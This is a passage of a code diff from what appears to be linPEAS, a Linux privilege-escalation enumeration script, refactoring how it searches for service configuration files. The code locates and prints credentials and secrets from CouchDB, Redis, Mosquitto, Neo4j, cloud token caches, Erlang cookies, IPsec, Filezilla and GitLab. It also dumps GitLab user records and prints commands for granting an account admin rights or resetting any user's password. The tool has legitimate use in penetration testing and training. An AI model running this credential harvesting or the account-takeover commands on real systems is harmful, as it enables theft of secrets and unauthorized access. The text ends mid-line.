"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," else echo_not_found "tmux" fi echo "" - #-- SI) Couchdb - printf $Y"[+] "$GREEN"Searching Couchdb directory\n"$NC - couchdb_dirs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'couchdb') - printf "%s\n" "$couchdb_dirs" | while read d; do - for f in `find $d -name local.ini 2>/dev/null`; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^;" | grep -v "^$" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - done - echo "" + print_2title "Analizing CouchDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Redis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; - #-- SI) Redis - printf $Y"[+] "$GREEN"Searching redis.conf\n"$NC - redisconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'redis\.conf$') - printf "%s\n" "$redisconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" #-- SI) Dovecot # Needs testing - printf $Y"[+] "$GREEN"Searching dovecot files\n"$NC + print_2title "Searching dovecot files" dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then + if [ -z "$dovecotpass" ]; then echo_not_found "dovecot credentials" else for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null done fi echo "" - #-- SI) Mosquitto - printf $Y"[+] "$GREEN"Searching mosquitto.conf\n"$NC - mqttconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mosquitto\.conf$') - printf "%s\n" "$mqttconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" + print_2title "Analizing Mosquitto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - #-- SI) Neo4j - printf $Y"[+] "$GREEN"Searching neo4j auth file\n"$NC - neo4j=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'neo4j') - printf "%s\n" "$neo4j" | while read d; do - if [ -r "$d" ]; then - echo "Found readable $d" - find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" - #-- SI) Cloud-Init - printf $Y"[+] "$GREEN"Searching Cloud-Init conf file\n"$NC - cloudcfg=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cloud\.cfg$') - printf "%s\n" "$cloudcfg" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Neo4j Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - ##-- SI) Erlang - printf $Y"[+] "$GREEN"Searching Erlang cookie file\n"$NC - erlangcoo=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '.erlang.cookie$') - printf "%s\n" "$erlangcoo" | while read f; do - if [ -r "$f" ]; then - echo "Found Erlang cookie: $f" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) GVM - printf $Y"[+] "$GREEN"Searching GVM auth file\n"$NC - gvmconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'gvm-tools\.conf') - printf "%s\n" "$gvmconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found GVM auth file: $f" - cat "$f" 2>/dev/null | sed -${E} "s,username.*|password.*,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Cloud credentials Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then echo_not_found "access_tokens.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then echo_not_found "access_tokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then echo_not_found "accessTokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then echo_not_found "azureProfile.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then echo_not_found "TokenCache.dat"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then echo_not_found "AzureRMContext.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - ##-- SI) IPSEC - printf $Y"[+] "$GREEN"Searching IPSEC files\n"$NC - ipsecconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'ipsec\.secrets|ipsec\.conf') - printf "%s\n" "$ipsecconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found IPSEC file: $f" - cat "$f" 2>/dev/null | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) IRSSI - printf $Y"[+] "$GREEN"Searching IRSSI files\n"$NC - irssifols=$(echo "$FIND_DIR_VAR\n$FIND_DIR_HOME\n$FIND_DIR_ETC\n$FIND_DIR_OTP\n$FIND_DIR_USR\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E '.irssi') - printf "%s\n" "$irssifols" | while read d; do - if [ -r "$d/config" ]; then - echo "Found IRSSI config file: $d/config" - cat "$d/config" 2>/dev/null | sed -${E} "s,password.*,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Cloud-Init Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; - ##-- SI) Keyring - printf $Y"[+] "$GREEN"Searching Keyring files\n"$NC - keyringsfilesfolds=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring$|*\.keystore$') - printf "%s\n" "$keyringsfilesfolds" | sort | uniq | while read f; do - if [ -f "$f" ]; then - echo "Keyring file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - elif [ -d "$f" ]; then - echo "Keyring folder: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - ls -lR "$f" 2>/dev/null | sed -${E} "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) Filezilla - printf $Y"[+] "$GREEN"Searching Filezilla sites file\n"$NC - filezillaconfs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_OPT\n$FIND_DIR_MNT" | grep -E 'filelliza') - printf "%s\n" "$filezillaconfs" | uniq | while read f; do - if [ -d "$f" ]; then - echo "Found Filezilla folder: $f" - if [ -f "$f/sitemanager.xml" ]; then - cat "$f/sitemanager.xml" 2>/dev/null | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${C}[1;31m&${C}[0m," - fi - fi - done - echo "" + print_2title "Analizing CloudFlare Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Erlang Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing GMV Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing IPSec Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing IRSSI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Keyring Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filelliza$\"`" ]; then echo_not_found "filelliza"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filelliza$" | while read f; do ls -ld "$f" | sed -${E} "s,filelliza$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Backup Manager Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - ##-- SI) BACKUP-MANAGER - printf $Y"[+] "$GREEN"Searching backup-manager files\n"$NC - backupmanager=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_OPT\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'storage.php|database.php') - printf "%s\n" "$backupmanager" | sort | uniq | while read f; do - if [ -f "$f" ]; then - echo "backup-manager file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${C}[1;31m&${C}[0m," - fi - done - echo "" ##-- SI) passwd files (splunk) - printf $Y"[+] "$GREEN"Searching uncommon passwd files (splunk)\n"$NC - splunkpwd=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/etc/passwd$" | grep -E 'passwd$') + print_2title "Searching uncommon passwd files (splunk)" SPLUNK_BIN="`command -v splunk 2>/dev/null`" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi - printf "%s\n" "$splunkpwd" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${C}[1;31m&${C}[0m," + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi + printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," fi done echo "" ##-- SI) Gitlab - printf $Y"[+] "$GREEN"Searching GitLab related files\n"$NC + print_2title "Searching GitLab related files" #Check gitlab-rails if [ "`command -v gitlab-rails`" ]; then echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${C}[1;31m&${C}[0m," + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" echo "" @@ -2610,127 +2468,96 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" fi #Check gitlab files - gitlabfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/lib" | grep -E "secrets.yml$|gitlab.yml$|gitlab.rb$") - printf "%s\n" "$gitlabfiles" | sort | uniq | while read f; do + printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if [ "`echo $f | grep secrets.yml`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" 2>/dev/null | grep -v "^$" | grep -v "^#" + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" elif [ "`echo $f | grep gitlab.yml`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + echo "Found $f" | sed "s,$f,${SED_RED}," cat "$f" | grep -A 4 "repositories:" elif [ "`echo $f | grep gitlab.rb`" ]; then - echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," - cat "$f" | grep -v "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${C}[1;31m&${C}[0m," + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," fi echo "" done echo "" - ##-- SI) PGP/GPG - printf $Y"[+] "$GREEN"Searching PGP/GPG\n"$NC - pgpg=$(echo "$FIND_HOME\n$FIND_PRIVATE\n$FIND_MNT" | grep -E '\.pgp$|\.gpg$|.gnupg') - if [ "$pgpg" ]; then echo "PGP/GPG files found:" ; - printf "%s\n" "$pgpg" | sort | uniq | while read f; do - if [ -f "$f" ]; then - ls -l "$f" - else - ls -ld "$f" - ls -l "$f" 2>/dev/null - fi - done - echo "" - fi - echo "PGP/GPG software:" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" + print_2title "Analizing Github Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Svn Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; + + + print_2title "Analizing PGP-GPG Files (limit 70)" + ((command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null + ((command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null + (command -v netpgp || echo_not_found "netpgp") 2>/dev/null + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E 